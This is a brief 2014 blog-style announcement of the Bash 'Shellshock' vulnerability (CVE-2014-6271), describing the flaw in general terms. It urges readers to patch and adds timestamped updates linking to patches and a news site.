The National Vulnerability Database has released a warning that all major versions of GNU Bash contain a vulnerability labeled CVE-2014-6271. The vulnerability is contained in how Bash processes trailing strings after function definitions in the values of environment variables. This permits remote attackers to execute code via any number of vectors that allow command execution, such as mod_cgi or mod_cgid in Apache, ForceCommand in OpenSSH, etc. Currently there are a few patches to fix the issue; they can be viewed and download here:
Many are comparing this vulnerability to the Heartbleed bug from earlier this year in terms of seriousness and potential damage. It is crucial to patch this vulnerability as soon as possible or switch to another shell that has more active development, such as zsh (http://www.zsh.org/) or fish (http://fishshell.com/). It is reported that Red Hat is currently testing other shells for vulnerabilities, but thus far has been happy to report that they have not found any.
On a less serious note an equally great tragedy is the lack of a catchy name like Heartbleed. I was thinking something like BashSmash?
Update 9/25/2014 9:09AM: News outlets have begun calling the vulnerability “Shell Shock”.
Update 9/25/2014 9:23AM: A patch was released on Seclists.org from Chet Ramey and can be found here: http://seclists.org/oss-sec/2014/q3/att-690/eol-pushback.patch. Please note that this is unofficial and has not been widely tested as of yet.
Update 9/25/2014 3:40PM: We’ve set up a website http://www.shellshockvuln.com to provide the latest news and information on patches, updates, and further vulnerabilities.